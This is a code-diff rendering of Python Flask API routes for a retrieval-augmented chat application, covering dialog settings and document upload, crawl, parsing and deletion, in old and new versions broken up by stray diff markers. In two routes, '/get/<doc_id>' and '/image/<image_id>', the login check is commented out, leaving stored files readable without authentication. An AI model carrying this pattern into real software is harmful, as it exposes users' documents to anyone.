return get_json_result(data=dia)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
def get_kb_names(kb_ids):
|
||||
ids, nms = [], []
|
||||
for kid in kb_ids:
|
||||
e, kb = KnowledgebaseService.get_by_id(kid)
|
||||
if not e or kb.status != StatusEnum.VALID.value:
|
||||
continue
|
||||
ids.append(kid)
|
||||
nms.append(kb.name)
|
||||
return ids, nms
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def list_dialogs():
|
||||
try:
|
||||
diags = DialogService.query(
|
||||
tenant_id=current_user.id,
|
||||
status=StatusEnum.VALID.value,
|
||||
reverse=True,
|
||||
order_by=DialogService.model.create_time)
|
||||
diags = [d.to_dict() for d in diags]
|
||||
for d in diags:
|
||||
d["kb_ids"], d["kb_names"] = get_kb_names(d["kb_ids"])
|
||||
return get_json_result(data=diags)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/rm', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("dialog_ids")
|
||||
def rm():
|
||||
req = request.json
|
||||
try:
|
||||
DialogService.update_many_by_id(
|
||||
[{"id": id, "status": StatusEnum.INVALID.value} for id in req["dialog_ids"]])
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
from flask import request
|
||||
from flask_login import login_required, current_user
|
||||
from api.db.services.dialog_service import DialogService
|
||||
from api.db import StatusEnum
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.user_service import TenantService, UserTenantService
|
||||
from api.settings import RetCode
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import get_json_result
|
||||
|
||||
|
||||
@manager.route('/set', methods=['POST'])
|
||||
@login_required
|
||||
def set_dialog():
|
||||
req = request.json
|
||||
dialog_id = req.get("dialog_id")
|
||||
name = req.get("name", "New Dialog")
|
||||
description = req.get("description", "A helpful Dialog")
|
||||
icon = req.get("icon", "")
|
||||
top_n = req.get("top_n", 6)
|
||||
top_k = req.get("top_k", 1024)
|
||||
rerank_id = req.get("rerank_id", "")
|
||||
if not rerank_id: req["rerank_id"] = ""
|
||||
similarity_threshold = req.get("similarity_threshold", 0.1)
|
||||
vector_similarity_weight = req.get("vector_similarity_weight", 0.3)
|
||||
if vector_similarity_weight is None: vector_similarity_weight = 0.3
|
||||
llm_setting = req.get("llm_setting", {})
|
||||
default_prompt = {
|
||||
"system": """你是一个智能助手,请总结知识库的内容来回答问题,请列举知识库中的数据详细回答。当所有知识库内容都与问题无关时,你的回答必须包括“知识库中未找到您要的答案!”这句话。回答需要考虑聊天历史。
|
||||
以下是知识库:
|
||||
{knowledge}
|
||||
以上是知识库。""",
|
||||
"prologue": "您好,我是您的助手小樱,长得可爱又善良,can I help you?",
|
||||
"parameters": [
|
||||
{"key": "knowledge", "optional": False}
|
||||
],
|
||||
"empty_response": "Sorry! 知识库中未找到相关内容!"
|
||||
}
|
||||
prompt_config = req.get("prompt_config", default_prompt)
|
||||
|
||||
if not prompt_config["system"]:
|
||||
prompt_config["system"] = default_prompt["system"]
|
||||
# if len(prompt_config["parameters"]) < 1:
|
||||
# prompt_config["parameters"] = default_prompt["parameters"]
|
||||
# for p in prompt_config["parameters"]:
|
||||
# if p["key"] == "knowledge":break
|
||||
# else: prompt_config["parameters"].append(default_prompt["parameters"][0])
|
||||
|
||||
for p in prompt_config["parameters"]:
|
||||
if p["optional"]:
|
||||
continue
|
||||
if prompt_config["system"].find("{%s}" % p["key"]) < 0:
|
||||
return get_data_error_result(
|
||||
retmsg="Parameter '{}' is not used".format(p["key"]))
|
||||
|
||||
try:
|
||||
e, tenant = TenantService.get_by_id(current_user.id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
llm_id = req.get("llm_id", tenant.llm_id)
|
||||
if not dialog_id:
|
||||
if not req.get("kb_ids"):
|
||||
return get_data_error_result(
|
||||
retmsg="Fail! Please select knowledgebase!")
|
||||
dia = {
|
||||
"id": get_uuid(),
|
||||
"tenant_id": current_user.id,
|
||||
"name": name,
|
||||
"kb_ids": req["kb_ids"],
|
||||
"description": description,
|
||||
"llm_id": llm_id,
|
||||
"llm_setting": llm_setting,
|
||||
"prompt_config": prompt_config,
|
||||
"top_n": top_n,
|
||||
"top_k": top_k,
|
||||
"rerank_id": rerank_id,
|
||||
"similarity_threshold": similarity_threshold,
|
||||
"vector_similarity_weight": vector_similarity_weight,
|
||||
"icon": icon
|
||||
}
|
||||
if not DialogService.save(**dia):
|
||||
return get_data_error_result(retmsg="Fail to new a dialog!")
|
||||
e, dia = DialogService.get_by_id(dia["id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Fail to new a dialog!")
|
||||
return get_json_result(data=dia.to_json())
|
||||
else:
|
||||
del req["dialog_id"]
|
||||
if "kb_names" in req:
|
||||
del req["kb_names"]
|
||||
if not DialogService.update_by_id(dialog_id, req):
|
||||
return get_data_error_result(retmsg="Dialog not found!")
|
||||
e, dia = DialogService.get_by_id(dialog_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Fail to update a dialog!")
|
||||
dia = dia.to_dict()
|
||||
dia["kb_ids"], dia["kb_names"] = get_kb_names(dia["kb_ids"])
|
||||
return get_json_result(data=dia)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/get', methods=['GET'])
|
||||
@login_required
|
||||
def get():
|
||||
dialog_id = request.args["dialog_id"]
|
||||
try:
|
||||
e, dia = DialogService.get_by_id(dialog_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Dialog not found!")
|
||||
dia = dia.to_dict()
|
||||
dia["kb_ids"], dia["kb_names"] = get_kb_names(dia["kb_ids"])
|
||||
return get_json_result(data=dia)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
def get_kb_names(kb_ids):
|
||||
ids, nms = [], []
|
||||
for kid in kb_ids:
|
||||
e, kb = KnowledgebaseService.get_by_id(kid)
|
||||
if not e or kb.status != StatusEnum.VALID.value:
|
||||
continue
|
||||
ids.append(kid)
|
||||
nms.append(kb.name)
|
||||
return ids, nms
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def list_dialogs():
|
||||
try:
|
||||
diags = DialogService.query(
|
||||
tenant_id=current_user.id,
|
||||
status=StatusEnum.VALID.value,
|
||||
reverse=True,
|
||||
order_by=DialogService.model.create_time)
|
||||
diags = [d.to_dict() for d in diags]
|
||||
for d in diags:
|
||||
d["kb_ids"], d["kb_names"] = get_kb_names(d["kb_ids"])
|
||||
return get_json_result(data=diags)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/rm', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("dialog_ids")
|
||||
def rm():
|
||||
req = request.json
|
||||
dialog_list=[]
|
||||
tenants = UserTenantService.query(user_id=current_user.id)
|
||||
try:
|
||||
for id in req["dialog_ids"]:
|
||||
for tenant in tenants:
|
||||
if DialogService.query(tenant_id=tenant.tenant_id, id=id):
|
||||
break
|
||||
else:
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of dialog authorized for this operation.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
dialog_list.append({"id": id,"status":StatusEnum.INVALID.value})
|
||||
DialogService.update_many_by_id(dialog_list)
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
@ -1,418 +1,484 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License
|
||||
#
|
||||
|
||||
import os
|
||||
import pathlib
|
||||
import re
|
||||
|
||||
import flask
|
||||
from elasticsearch_dsl import Q
|
||||
from flask import request
|
||||
from flask_login import login_required, current_user
|
||||
|
||||
from api.db.db_models import Task, File
|
||||
from api.db.services.file2document_service import File2DocumentService
|
||||
from api.db.services.file_service import FileService
|
||||
from api.db.services.task_service import TaskService, queue_tasks
|
||||
from rag.nlp import search
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
from api.db.services import duplicate_name
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from api.utils import get_uuid
|
||||
from api.db import FileType, TaskStatus, ParserType, FileSource
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.settings import RetCode
|
||||
from api.utils.api_utils import get_json_result
|
||||
from rag.utils.minio_conn import MINIO
|
||||
from api.utils.file_utils import filename_type, thumbnail
|
||||
|
||||
|
||||
@manager.route('/upload', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("kb_id")
|
||||
def upload():
|
||||
kb_id = request.form.get("kb_id")
|
||||
if not kb_id:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
|
||||
if 'file' not in request.files:
|
||||
return get_json_result(
|
||||
data=False, retmsg='No file part!', retcode=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
file_objs = request.files.getlist('file')
|
||||
for file_obj in file_objs:
|
||||
if file_obj.filename == '':
|
||||
return get_json_result(
|
||||
data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
e, kb = KnowledgebaseService.get_by_id(kb_id)
|
||||
if not e:
|
||||
raise LookupError("Can't find this knowledgebase!")
|
||||
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
pf_id = root_folder["id"]
|
||||
FileService.init_knowledgebase_docs(pf_id, current_user.id)
|
||||
kb_root_folder = FileService.get_kb_folder(current_user.id)
|
||||
kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])
|
||||
|
||||
err = []
|
||||
for file in file_objs:
|
||||
try:
|
||||
MAX_FILE_NUM_PER_USER = int(os.environ.get('MAX_FILE_NUM_PER_USER', 0))
|
||||
if MAX_FILE_NUM_PER_USER > 0 and DocumentService.get_doc_count(kb.tenant_id) >= MAX_FILE_NUM_PER_USER:
|
||||
raise RuntimeError("Exceed the maximum file number of a free user!")
|
||||
|
||||
filename = duplicate_name(
|
||||
DocumentService.query,
|
||||
name=file.filename,
|
||||
kb_id=kb.id)
|
||||
filetype = filename_type(filename)
|
||||
if filetype == FileType.OTHER.value:
|
||||
raise RuntimeError("This type of file has not been supported yet!")
|
||||
|
||||
location = filename
|
||||
while MINIO.obj_exist(kb_id, location):
|
||||
location += "_"
|
||||
blob = file.read()
|
||||
MINIO.put(kb_id, location, blob)
|
||||
doc = {
|
||||
"id": get_uuid(),
|
||||
"kb_id": kb.id,
|
||||
"parser_id": kb.parser_id,
|
||||
"parser_config": kb.parser_config,
|
||||
"created_by": current_user.id,
|
||||
"type": filetype,
|
||||
"name": filename,
|
||||
"location": location,
|
||||
"size": len(blob),
|
||||
"thumbnail": thumbnail(filename, blob)
|
||||
}
|
||||
if doc["type"] == FileType.VISUAL:
|
||||
doc["parser_id"] = ParserType.PICTURE.value
|
||||
if re.search(r"\.(ppt|pptx|pages)$", filename):
|
||||
doc["parser_id"] = ParserType.PRESENTATION.value
|
||||
DocumentService.insert(doc)
|
||||
|
||||
FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
|
||||
except Exception as e:
|
||||
err.append(file.filename + ": " + str(e))
|
||||
if err:
|
||||
return get_json_result(
|
||||
data=False, retmsg="\n".join(err), retcode=RetCode.SERVER_ERROR)
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/create', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("name", "kb_id")
|
||||
def create():
|
||||
req = request.json
|
||||
kb_id = req["kb_id"]
|
||||
if not kb_id:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
try:
|
||||
e, kb = KnowledgebaseService.get_by_id(kb_id)
|
||||
if not e:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't find this knowledgebase!")
|
||||
|
||||
if DocumentService.query(name=req["name"], kb_id=kb_id):
|
||||
return get_data_error_result(
|
||||
retmsg="Duplicated document name in the same knowledgebase.")
|
||||
|
||||
doc = DocumentService.insert({
|
||||
"id": get_uuid(),
|
||||
"kb_id": kb.id,
|
||||
"parser_id": kb.parser_id,
|
||||
"parser_config": kb.parser_config,
|
||||
"created_by": current_user.id,
|
||||
"type": FileType.VIRTUAL,
|
||||
"name": req["name"],
|
||||
"location": "",
|
||||
"size": 0
|
||||
})
|
||||
return get_json_result(data=doc.to_json())
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def list_docs():
|
||||
kb_id = request.args.get("kb_id")
|
||||
if not kb_id:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
|
||||
keywords = request.args.get("keywords", "")
|
||||
|
||||
page_number = int(request.args.get("page", 1))
|
||||
items_per_page = int(request.args.get("page_size", 15))
|
||||
orderby = request.args.get("orderby", "create_time")
|
||||
desc = request.args.get("desc", True)
|
||||
try:
|
||||
docs, tol = DocumentService.get_by_kb_id(
|
||||
kb_id, page_number, items_per_page, orderby, desc, keywords)
|
||||
return get_json_result(data={"total": tol, "docs": docs})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/thumbnails', methods=['GET'])
|
||||
@login_required
|
||||
def thumbnails():
|
||||
doc_ids = request.args.get("doc_ids").split(",")
|
||||
if not doc_ids:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Lack of "Document ID"', retcode=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
try:
|
||||
docs = DocumentService.get_thumbnails(doc_ids)
|
||||
return get_json_result(data={d["id"]: d["thumbnail"] for d in docs})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/change_status', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_id", "status")
|
||||
def change_status():
|
||||
req = request.json
|
||||
if str(req["status"]) not in ["0", "1"]:
|
||||
get_json_result(
|
||||
data=False,
|
||||
retmsg='"Status" must be either 0 or 1!',
|
||||
retcode=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
e, kb = KnowledgebaseService.get_by_id(doc.kb_id)
|
||||
if not e:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't find this knowledgebase!")
|
||||
|
||||
if not DocumentService.update_by_id(
|
||||
req["doc_id"], {"status": str(req["status"])}):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document update)!")
|
||||
|
||||
if str(req["status"]) == "0":
|
||||
ELASTICSEARCH.updateScriptByQuery(Q("term", doc_id=req["doc_id"]),
|
||||
scripts="ctx._source.available_int=0;",
|
||||
idxnm=search.index_name(
|
||||
kb.tenant_id)
|
||||
)
|
||||
else:
|
||||
ELASTICSEARCH.updateScriptByQuery(Q("term", doc_id=req["doc_id"]),
|
||||
scripts="ctx._source.available_int=1;",
|
||||
idxnm=search.index_name(
|
||||
kb.tenant_id)
|
||||
)
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/rm', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_id")
|
||||
def rm():
|
||||
req = request.json
|
||||
doc_ids = req["doc_id"]
|
||||
if isinstance(doc_ids, str): doc_ids = [doc_ids]
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
pf_id = root_folder["id"]
|
||||
FileService.init_knowledgebase_docs(pf_id, current_user.id)
|
||||
errors = ""
|
||||
for doc_id in doc_ids:
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
tenant_id = DocumentService.get_tenant_id(doc_id)
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
|
||||
b, n = File2DocumentService.get_minio_address(doc_id=doc_id)
|
||||
|
||||
if not DocumentService.remove_document(doc, tenant_id):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document removal)!")
|
||||
|
||||
f2d = File2DocumentService.get_by_document_id(doc_id)
|
||||
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
|
||||
File2DocumentService.delete_by_document_id(doc_id)
|
||||
|
||||
MINIO.rm(b, n)
|
||||
except Exception as e:
|
||||
errors += str(e)
|
||||
|
||||
if errors:
|
||||
return get_json_result(data=False, retmsg=errors, retcode=RetCode.SERVER_ERROR)
|
||||
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/run', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_ids", "run")
|
||||
def run():
|
||||
req = request.json
|
||||
try:
|
||||
for id in req["doc_ids"]:
|
||||
info = {"run": str(req["run"]), "progress": 0}
|
||||
if str(req["run"]) == TaskStatus.RUNNING.value:
|
||||
info["progress_msg"] = ""
|
||||
info["chunk_num"] = 0
|
||||
info["token_num"] = 0
|
||||
DocumentService.update_by_id(id, info)
|
||||
# if str(req["run"]) == TaskStatus.CANCEL.value:
|
||||
tenant_id = DocumentService.get_tenant_id(id)
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
ELASTICSEARCH.deleteByQuery(
|
||||
Q("match", doc_id=id), idxnm=search.index_name(tenant_id))
|
||||
|
||||
if str(req["run"]) == TaskStatus.RUNNING.value:
|
||||
TaskService.filter_delete([Task.doc_id == id])
|
||||
e, doc = DocumentService.get_by_id(id)
|
||||
doc = doc.to_dict()
|
||||
doc["tenant_id"] = tenant_id
|
||||
bucket, name = File2DocumentService.get_minio_address(doc_id=doc["id"])
|
||||
queue_tasks(doc, bucket, name)
|
||||
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/rename', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_id", "name")
|
||||
def rename():
|
||||
req = request.json
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
if pathlib.Path(req["name"].lower()).suffix != pathlib.Path(
|
||||
doc.name.lower()).suffix:
|
||||
return get_json_result(
|
||||
data=False,
|
||||
retmsg="The extension of file can't be changed",
|
||||
retcode=RetCode.ARGUMENT_ERROR)
|
||||
for d in DocumentService.query(name=req["name"], kb_id=doc.kb_id):
|
||||
if d.name == req["name"]:
|
||||
return get_data_error_result(
|
||||
retmsg="Duplicated document name in the same knowledgebase.")
|
||||
|
||||
if not DocumentService.update_by_id(
|
||||
req["doc_id"], {"name": req["name"]}):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document rename)!")
|
||||
|
||||
informs = File2DocumentService.get_by_document_id(req["doc_id"])
|
||||
if informs:
|
||||
e, file = FileService.get_by_id(informs[0].file_id)
|
||||
FileService.update_by_id(file.id, {"name": req["name"]})
|
||||
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/get/<doc_id>', methods=['GET'])
|
||||
# @login_required
|
||||
def get(doc_id):
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
|
||||
b,n = File2DocumentService.get_minio_address(doc_id=doc_id)
|
||||
response = flask.make_response(MINIO.get(b, n))
|
||||
|
||||
ext = re.search(r"\.([^.]+)$", doc.name)
|
||||
if ext:
|
||||
if doc.type == FileType.VISUAL.value:
|
||||
response.headers.set('Content-Type', 'image/%s' % ext.group(1))
|
||||
else:
|
||||
response.headers.set(
|
||||
'Content-Type',
|
||||
'application/%s' %
|
||||
ext.group(1))
|
||||
return response
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/change_parser', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_id", "parser_id")
|
||||
def change_parser():
|
||||
req = request.json
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
if doc.parser_id.lower() == req["parser_id"].lower():
|
||||
if "parser_config" in req:
|
||||
if req["parser_config"] == doc.parser_config:
|
||||
return get_json_result(data=True)
|
||||
else:
|
||||
return get_json_result(data=True)
|
||||
|
||||
if doc.type == FileType.VISUAL or re.search(
|
||||
r"\.(ppt|pptx|pages)$", doc.name):
|
||||
return get_data_error_result(retmsg="Not supported yet!")
|
||||
|
||||
e = DocumentService.update_by_id(doc.id,
|
||||
{"parser_id": req["parser_id"], "progress": 0, "progress_msg": "",
|
||||
"run": TaskStatus.UNSTART.value})
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
if "parser_config" in req:
|
||||
DocumentService.update_parser_config(doc.id, req["parser_config"])
|
||||
if doc.token_num > 0:
|
||||
e = DocumentService.increment_chunk_num(doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1,
|
||||
doc.process_duation * -1)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
ELASTICSEARCH.deleteByQuery(
|
||||
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
|
||||
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/image/<image_id>', methods=['GET'])
|
||||
# @login_required
|
||||
def get_image(image_id):
|
||||
try:
|
||||
bkt, nm = image_id.split("-")
|
||||
response = flask.make_response(MINIO.get(bkt, nm))
|
||||
response.headers.set('Content-Type', 'image/JPEG')
|
||||
return response
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License
|
||||
#
|
||||
import datetime
|
||||
import hashlib
|
||||
import json
|
||||
import os
|
||||
import pathlib
|
||||
import re
|
||||
import traceback
|
||||
from concurrent.futures import ThreadPoolExecutor
|
||||
from copy import deepcopy
|
||||
from io import BytesIO
|
||||
|
||||
import flask
|
||||
from elasticsearch_dsl import Q
|
||||
from flask import request
|
||||
from flask_login import login_required, current_user
|
||||
|
||||
from api.db.db_models import Task, File
|
||||
from api.db.services.dialog_service import DialogService, ConversationService
|
||||
from api.db.services.file2document_service import File2DocumentService
|
||||
from api.db.services.file_service import FileService
|
||||
from api.db.services.llm_service import LLMBundle
|
||||
from api.db.services.task_service import TaskService, queue_tasks
|
||||
from api.db.services.user_service import TenantService, UserTenantService
|
||||
from graphrag.mind_map_extractor import MindMapExtractor
|
||||
from rag.app import naive
|
||||
from rag.nlp import search
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
from api.db.services import duplicate_name
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from api.utils import get_uuid
|
||||
from api.db import FileType, TaskStatus, ParserType, FileSource, LLMType
|
||||
from api.db.services.document_service import DocumentService, doc_upload_and_parse
|
||||
from api.settings import RetCode, stat_logger
|
||||
from api.utils.api_utils import get_json_result
|
||||
from rag.utils.storage_factory import STORAGE_IMPL
|
||||
from api.utils.file_utils import filename_type, thumbnail, get_project_base_directory
|
||||
from api.utils.web_utils import html2pdf, is_valid_url
|
||||
|
||||
|
||||
@manager.route('/upload', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("kb_id")
|
||||
def upload():
|
||||
kb_id = request.form.get("kb_id")
|
||||
if not kb_id:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
|
||||
if 'file' not in request.files:
|
||||
return get_json_result(
|
||||
data=False, retmsg='No file part!', retcode=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
file_objs = request.files.getlist('file')
|
||||
for file_obj in file_objs:
|
||||
if file_obj.filename == '':
|
||||
return get_json_result(
|
||||
data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
e, kb = KnowledgebaseService.get_by_id(kb_id)
|
||||
if not e:
|
||||
raise LookupError("Can't find this knowledgebase!")
|
||||
|
||||
err, _ = FileService.upload_document(kb, file_objs, current_user.id)
|
||||
if err:
|
||||
return get_json_result(
|
||||
data=False, retmsg="\n".join(err), retcode=RetCode.SERVER_ERROR)
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/web_crawl', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("kb_id", "name", "url")
|
||||
def web_crawl():
|
||||
kb_id = request.form.get("kb_id")
|
||||
if not kb_id:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
|
||||
name = request.form.get("name")
|
||||
url = request.form.get("url")
|
||||
if not is_valid_url(url):
|
||||
return get_json_result(
|
||||
data=False, retmsg='The URL format is invalid', retcode=RetCode.ARGUMENT_ERROR)
|
||||
e, kb = KnowledgebaseService.get_by_id(kb_id)
|
||||
if not e:
|
||||
raise LookupError("Can't find this knowledgebase!")
|
||||
|
||||
blob = html2pdf(url)
|
||||
if not blob: return server_error_response(ValueError("Download failure."))
|
||||
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
pf_id = root_folder["id"]
|
||||
FileService.init_knowledgebase_docs(pf_id, current_user.id)
|
||||
kb_root_folder = FileService.get_kb_folder(current_user.id)
|
||||
kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])
|
||||
|
||||
try:
|
||||
filename = duplicate_name(
|
||||
DocumentService.query,
|
||||
name=name + ".pdf",
|
||||
kb_id=kb.id)
|
||||
filetype = filename_type(filename)
|
||||
if filetype == FileType.OTHER.value:
|
||||
raise RuntimeError("This type of file has not been supported yet!")
|
||||
|
||||
location = filename
|
||||
while STORAGE_IMPL.obj_exist(kb_id, location):
|
||||
location += "_"
|
||||
STORAGE_IMPL.put(kb_id, location, blob)
|
||||
doc = {
|
||||
"id": get_uuid(),
|
||||
"kb_id": kb.id,
|
||||
"parser_id": kb.parser_id,
|
||||
"parser_config": kb.parser_config,
|
||||
"created_by": current_user.id,
|
||||
"type": filetype,
|
||||
"name": filename,
|
||||
"location": location,
|
||||
"size": len(blob),
|
||||
"thumbnail": thumbnail(filename, blob)
|
||||
}
|
||||
if doc["type"] == FileType.VISUAL:
|
||||
doc["parser_id"] = ParserType.PICTURE.value
|
||||
if doc["type"] == FileType.AURAL:
|
||||
doc["parser_id"] = ParserType.AUDIO.value
|
||||
if re.search(r"\.(ppt|pptx|pages)$", filename):
|
||||
doc["parser_id"] = ParserType.PRESENTATION.value
|
||||
DocumentService.insert(doc)
|
||||
FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/create', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("name", "kb_id")
|
||||
def create():
|
||||
req = request.json
|
||||
kb_id = req["kb_id"]
|
||||
if not kb_id:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
try:
|
||||
e, kb = KnowledgebaseService.get_by_id(kb_id)
|
||||
if not e:
|
